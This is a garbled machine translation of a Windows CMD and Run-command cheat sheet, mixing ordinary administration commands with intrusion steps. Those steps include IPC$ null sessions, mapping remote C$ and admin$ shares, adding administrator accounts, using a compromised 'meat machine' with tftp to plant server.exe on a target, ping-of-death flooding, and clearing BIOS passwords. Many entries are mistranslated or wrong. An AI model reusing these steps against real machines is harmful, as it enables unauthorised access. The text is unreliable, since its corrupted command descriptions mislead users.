Note: cmd command a lot, need to use when you can query!

CMD command: Start-to-run, type cmd or command (you can see the system version, the file system version on the command line)

CHCP modifying the default character set
CHCP 936 Default Chinese
Chcp 65001

1. Appwiz.cpl: Programs and functions
2. Calc: Start Calculator
5. Chkdsk.exe:Chkdsk disk Check (Administrator Run command prompt)
6. cleanmgr: Open Disk Cleanup Tool
9. Cmd.exe:CMD Command Prompt
10. Auto Power off command
Shutdown-s-T 600: Auto power off after 600 seconds
Shutdown-a: can cancel timer shutdown
Shutdown-r-T 600: Indicates automatic restart after 600 seconds
Compmgmtlauncher: Computer Management
Compmgmt.msc: Computer Management
Credwiz: Backing up or restoring a Stored user name and password
Control: Controlling the surface version
DCOMCNFG: Opening system Component Services
Devmgmt.msc: Device Manager
Desk.cpl: Screen resolution
Dfrgui: Optimized drive Windows 7→dfrg.msc: Disk Defragmenter
Dialer: Telephone dialer
Diskmgmt.msc: Disk Management
Dvdplay:dvd player
DxDiag: Checking DirectX information
Eudcedit: The process of word-of-font
EVENTVWR: Event Viewer
Explorer: Open Explorer
Firewall.cpl:Windows Firewall
Fsmgmt.msc: Shared Folder Manager
Gpedit.msc: Group Policy
Hdwwiz.cpl: Device Manager
Inetcpl.cpl:Internet Properties
Intl.cpl: Regional
IExpress: Trojan Bundle tool, System comes with
Panax Joy.cpl: Game controller
Logoff: Logout command
Lusrmgr.msc: Local Users and Groups
Lpksetup: Language Pack Installation/Removal Wizard, the installation Wizard prompts you to download the language pack
Lusrmgr.msc: Native Users and Groups
Main.cpl: Mouse Properties
Mmsys.cpl: Sound
Mem.exe: Show memory usage (if the direct run is invalid, you can run the command prompt as an administrator, enter mem.exe>d:a.txt at the command prompt to open the D-disk view a.txt, which is the memory usage. Of course what kind of file name can be decided by oneself. )
MMC: Opening the console
Mobsync: Synchronous command
Msconfig.exe: System Configuration Utility
MSDT: Microsoft supports diagnostic tools
MSINFO32: System Information
MSPaint: Drawing
Msra:windows Remote Assistance
MSTSC: Remote Desktop Connection
Napclcfg. MSC: Client Configuration
Ncpa.cpl: Network connection
Narrator: "Narrator" on the screen
Netplwiz: Advanced user Account Control Panel, setting login security-related options
Netstat:an (TC) command Check interface
Notepad: Open Notepad
NSLOOKUP:IP Address Detectors
ODBCAD32:ODBC Data Source Manager
Optionalfeatures: Open the "Turn Windows features on or off" dialog box
OSK: Open on-Screen keyboard
Perfmon.msc: Computer Performance Monitor
. Perfmon: Computer Performance Monitor
A. PowerShell: provides powerful remote processing power
Printmanagement.msc: Print Management
Powercfg.cpl: Power Options
PSR: Problem Step Recorder
Rasphone: Network connection
Recdisc: Creating a system repair disc
Resmon: Resource Monitor
Rstrui: System Restore
Regedit.exe: Registration Form
Regedt32: Registry Editor
Rsop.msc: Group Policy result set
SDCLT: Backup status and configuration to see if the system has been backed up
Secpol.msc: Local Security Policy
Bayi. Services.msc: Local Service settings
Sfc/scannow: Scan errors and recover/windows File Protection
Sfc.exe: System File Checker
SHRPUBW: Create a shared folder
Sigverif: File Signature Validator
Slui:windows activation, viewing system activation information
SLMGR.VBS-DLV: Show detailed license information
Slmgr.vbs-dli: Display license information
SLMGR.VBS-XPR: Current License Expiration date
Slmgr.vbs-dti: Displays the Installation ID for offline excitation
SLMGR.VBS-IPK: (Product key) install the products key
Slmgr.vbs-ato: Activating windows
Slmgr.vbs-cpky: Clear the Product Key from the registry (to prevent an attack caused by a leak)
SLMGR.VBS-ILC: (License file) installation license
SLMGR.VBS-UPK: Uninstalling the Product Key
SLMGR.VBS-SKMS: (Name[ort]) Volume Licensing
Snippingtool: Tools that support no rules
Soundrecorder: Tape recorder, no recording time limit
Stikynot: Notes
Sysdm.cpl: System Properties
Sysedit: System Configuration Editor
SYSKEY: System encryption, once encrypted can not be solved, protect the system's dual password
94. Taskmgr: Task Manager (Legacy)
The TM Task Manager (new version)
Taskschd.msc: Task Scheduler
Timedate.cpl: Date and time
98. Useraccountcontrolsettings user Account Control settings
Utilman: Utility Manager
Wf.msc: Windows Firewall with Advanced Security
101. Wfs:windows Fax and Scan
102. Wiaacmgr: Scanner and Camera Wizard
103. Winver: About Windows
104. Wmimgmt.msc: Open Windows Management Architecture (WMI)
. Write: WordPad
106. Wscui.cpl: Operation Center
107. Wscript:windows Script Host Settings
108. Wuapp:windows Update
1. Disk operation,
Fdisk implicit parameter/mbr rebuild Master boot record fdisk/mbr rebuild master boot Record
Fdisk adds the/CMBR parameter after DOS7.0, which rebuilds the master boot record for the subsequent hard drive when multiple physical hard disks are hooked up, such as: Fdisk/cmbr 2, which overrides the master boot record for the second hard drive. (Be very careful when using, avoid the bad drive boot record damage)
Format parameter:/q Quick Format/u non-recoverable/autotest do not prompt/s to create MS-DOS boot disk format c:/q/u/autotest
2. Directory Operations
Dir [directory name or file name] [/s][/w][/p][/a] List directory parameter:/s find subdirectory/w only show file name/P page/a show hidden file DIR format.exe/s find Format.exe file for the disk and report location
MD (MKDIR) [directory name] Create directory MKDIR HELLOWORLD create HELLOWORLD Directory
CD (CHDIR) [directory name] PS: You can use relative directory or absolute directory to enter directory CD AA to enter the current folder under the AA directory, CD. Go to the previous folder CD \ Return to the root directory; CD C:\Windows into the C:\Windows folder
RD (RMDIR) [directory name] Delete Directory rd HELLOWORLD Delete HELLOWORLD directory
3. File operation
Delete directory and its files: rmdir [directory name or file name] [/s][/w][/p][/a]. Example RmDir c:\qqdownload/s Delete the Qqdownload directory for C-drives.
del [directory name or file name] [/f][/s][/q] Delete parameter:/F Delete read-only file/s delete the directory and all content under it Q/A does not confirm before deleting
Del c:\del/s/q automatically deletes the Del directory of the C drive.
copy [source file or directory] [target directory] copies files copy d:\pwin98\*.* c:\presetup Copies all the files of the D disk Pwin98 to the presetup of the C drive.
attrib [parameters] [source file or directory] File properties action command, attrib command can list or modify the properties of files on disk, file attributes include document (A), read-only (R), Hidden (H), System (S), for example: Attrib-h-r-s io.sys execute this command, will be the DOS system files Io.sys file read-only, hidden, system attributes are removed, this will be able to directly through the dir command to see the Io.sys file. attrib +h +r +s autoexec.bat will add the above attributes for the automatic batch file.
4. Memory operation
Debug Debugging Memory parameter-w [filename] write binary-o [address 1] [address 2] Output memory-Q exit Exp:o 10[return] O 71 01
[Return] 01[return] Q[return] DOS Change the value of the BIOS password in the corresponding location in the CMOS by writing 70H/71H Port to clear the award BIOS password. Debug can also crack the hard disk protection card, etc., However, it can only be used under pure DOS.
5. Partitioning operations
Partitioning a disk is typically divided into four partitions, which consist of a primary partition, an extended partition, and a logical partition.
Both PQ and Acronis disk Director can be used to resize partitions without losing data, as well as merge operations such as the XP system, where you use the PQ,WIN7 system to operate essentially the same way as Acronis disk director. can go online to find tutorials to see, do not re-install the system can adjust the size of the partition, but it is recommended that you back up the data and then adjust, after all, the direct operation of the hard disk is a certain risk.
NET use ipipc$ ""/user: "" to establish an IPC NULL link
NET use ipipc$ "password"/user: "username" establishes IPC non-null link
NET use h:ipc$ "password"/user: "User name" directly after the login map the other side C: to the local H:
NET use h:ipc$ to map the other side c: to Local H:
NET use ipipc$/del remove IPC links
NET use H:/del to delete mappings that map each other to local H:
NET user username password/add set up users
NET user Guest/active:yes activates the guest user
NET user to see which users are
NET user account name to view the properties of the account
net localgroup Administrators user name/add Add "user" to the administrator to have administrator privileges
net start to see which services are open
Net start service name (e.g.: net start Telnet, net start schedule)
NET stop service name stops a service
NET time destination IP to view the offset
NET time target Ip/set to set the local computer time to synchronize with the "Destination IP" host, plus the parameter/yes to cancel the confirmation message
NET view to see which shares are open within the local area network
NET view IP to see which shares are turned on in the other LAN
NET config display system network settings
NET logoff disconnected sharing
NET Pause Service name pauses a service
NET send IP "text message" to the other party to send messages
NET ver LAN network connection types and information that are in use
NET share viewing locally-enabled shares
NET share ipc$ turn on ipc$ sharing
NET share ipc$/del Delete ipc$ share
NET share C $/del removal of C. shared
NET user Guest 12345 log in with guest user and change password to 12345
NET password Password change system login password
Netstat-a See which ports are open, common Netstat-an
Netstat-n View Port network connectivity, common Netstat-an
Netstat-v viewing work in progress
NETSTAT-P protocol Name Example: Netstat-p tcq/ip view a protocol usage
Netstat-s View all protocol usage in use
Nbtstat-a IP 136 to 139 if one of the ports is open, you can see the name of the user who recently logged in.

Tracert-parameter IP (or computer name) trace route (packet), Parameter: "-W number" is used to set the time-out interval.
Ping IP (or domain name) sends the default size of 32 bytes of data to the host, parameter: "-l[space" packet size ";"-N Send data Number ";"-T "means to ping all the time.
PING-T-l 65550 ip death ping (send files larger than 64K and Ping is the ping of death)
Ipconfig (winipcfg) for Windows NT and XP (Windows 95 98) To view the local IP address, ipconfig the available parameters "/all" To display all configuration information
TLIST-T Displays the process as a tree list (additional tools for the system, which are not installed by default, within the Support/tools folder of the installation directory)
KILL-F process name plus-F parameter force end a process (additional tools for the system, default is not installed, in the Support/tools folder of the installation directory)
Del-f file name plus-f parameter can be deleted read-only files,/ar,/ah,/as,/AA respectively for the deletion of read-only, hidden, system, archive files,/a-r,/a-h,/a-s,/a-a means to delete files except read-only, hidden, system, archive. For example, "del/ar * *" means deleting all read-only files in the current directory, "Del/a-s * *" means deleting all files except system files in the current directory
DEL/S/q directory or use: rmdir/s/q directory/S to delete all subdirectories and files under directories and directories. Use the parameter/q at the same time to cancel the system confirmation when the delete operation is deleted directly. (two commands function the same)
Move drive letter path to move the file name of the files to be moved after moving the file name moved files, with the parameter/y will cancel to confirm that the mobile directory exists the same file prompt to overwrite directly
FC One.txt two.txt > 3st.txt compare two files and output the differences to the 3st.txt file, ">" and "> >" are redirect commands
At ID number to open a scheduled task that has already been registered
At/delete Stop all scheduled tasks, use parameter/yes to stop directly without confirmation
At ID number/delete stop a registered scheduled task
At View all scheduled tasks
At IP time program name (or a command)/R run the other program at some point and restart the computer
Finger username @host See which users have logged in recently
Telnet IP port far and landing server, default port is 23
Open IP connection to IP (after telnet login command)
Telnet directly on this computer telnet will enter the native Telnet
Copy path file name 1 path file name 2/y Copy the file 1 to the specified directory is file 2, with the parameter/y to cancel the confirmation you want to overwrite an existing directory file
Copy C:srv.exe ipadmin$ Copying the local c:srv.exe to the other side of the admin
Copy 1st.jpg/b+2st.txt/a 3st.jpg to hide 2st.txt content into 1st.jpg to generate 3st.jpg new file, Note: 2st.txt file header to empty three rows, parameters:/b refers to binary files,/a refers to the ASCLL format file
Copy ipadmin$svv.exe C: or: copyipadmin$*.* Copy the Srv.exe file (all files) under the admini$ share to local C:
xcopy to copy files or directory tree destination address directory name copy file and directory tree, with parameter/y will not prompt overwrite same file

Use the parameter/E to copy subdirectories under the directory together to the destination address.

Tftp-i own IP (using meat machine as a springboard when this with meat machine IP) Get Server.exec:server.exe login, the "IP" server.exe download to the target host C:server.exe parameters:-I refers to the binary mode of transmission, If the exe file is transferred, if not plus-I is transmitted in ASCII mode (transfer text file mode)
Tftp-i the other IP put C:server.exe login, upload the local c:server.exe to the host
The FTP IP port is used for uploading files to the server or for file operations, and the default port is 21. Bin refers to binary mode (executable file); The default is ASCII format (when text files are sent)
Route print shows the IP route, which will primarily display network address addres, subnet mask netmask, gateway address, Gateways Addres, interface address interface
ARP view and process ARP cache, ARP is the meaning of name resolution, is responsible for the resolution of an IP to a physical MAC address. ARP-A will show all the information
Start Program name or command/max or/min opens a new window and maximizes (minimizes) the running of a program or command
Mem View CPU Usage

attrib file name (directory name) to view the properties of a document (directory)
attrib file name-a-r-s-h or +a +r +s +h Remove (add) a file of the archive, read-only, system, hidden properties; + is added as a property
Dir view file, Parameters:/q Display file and directory belongs to the system which user,/T:C display file creation time,/t:a show the last time the file was accessed,/t:w last modified time
date/t, time/t using this parameter, "date/t", "time/t" will display only the current date and time without having to enter a new date and time
SET specifies the environment variable name = The character to assign to the variable set environment variable
Set shows all the current environment variables
Set P (or other character) displays all environment variables currently starting with the character P (or other characters)
Pause pauses the batch process and displays: Press any key to continue ....
If conditional processing is performed in a batch program (see the IF command and variable for more instructions)
Goto label directs cmd.exe to labeled rows in a batch program (labels must be on a separate line with a colon, for example: ": Start" tab)
The call path batch file name calls another batch program from the batch program (more instructions are shown in the calling/?)
For each file in a set of files, execute a specific command (see the for command and variable for more instructions)
echo on or off turns echo on or off, and the current ECHO setting is displayed only with echo without parameters
Echo information Displays information on the screen
echo Info >> pass.txt Saving "info" to a pass.txt file

findstr "Hello" aa.txt looking for string Hello in Aa.txt file
Find filename finds a file
Title Title name change cmd window title name
A color color value sets the cmd console foreground and background color; 0 = black, 1 = blue, 2 = green, 3 = Light green, 4 = red, 5= violet, 6 = yellow, 7 = white, 8 = Gray, 9 = blue, a= green, b= light aqua, c= red, d= light purple, e= yellow, f= bright white
Prompt name change cmd.exe display command prompt (change C:, D: Unified to: Entsky)

VER displays version information under a DOS window
Winver Pop-up window displays version information (memory size, system version, patch version, computer name)

Format drive letter/fs: Type formatted disk, type: FAT, FAT32, NTFS, Example: Format D:/fs:ntfs
MD Directory Name creation directory
Replace the file's directory replacement file to replace the source file
ren original filename new file name rename filename
Tree displays a table of contents, with parameter-F to list the file names in the first folder
Type file name Displays the contents of the text file

More file name display output file by screen
Doskey the command to lock = character
Doskey to unlock command = Lock command provided for DOS (Edit command line, Recall Win2K command, and create macro). such as: Lock dir command: Doskey Dir=entsky (cannot use Doskey dir=dir); Unlock: Doskey dir=

Taskmgr Bring up Task Manager
chkdsk/f d: Check disk D and Display status report, add parameter/F and Repair errors on disk
tlntadmn telnt service admn, type tlntadmn select 3, and then select 8, you can change the Telnet service default port 23 to any other port
Exit Cmd.exe program or currently, use the parameter/b to exit the current batch script instead of Cmd.exe

Path path The file name of the executable file is set to an executable file.
CMD launches a Win2K command Interpretation window. Parameters:/eff,/en Close, open command extension, more details see CMD/?
REGEDIT/S registry File name Import registry, parameters/s refers to quiet mode import, without any hint;
regedit/e registry File name Export Registry
The cacls filename parameter displays or modifies the File access control List (ACL)-when it is formatted for NTFS. Parameter:/d Username: Set deny user access;/p user name: Perm Replace the access rights of the specified user;/g user name: Perm gives the specified user access; Perm can be: N None, R read, W write, C Change (write), F Full Control; Example: cacls d:es T.TXT/D pub set D:est.txt deny pub user access.
cacls file name to view a list of Access user rights for files

REM text content add annotations to a batch file

Netsh view or change the configuration of the local network


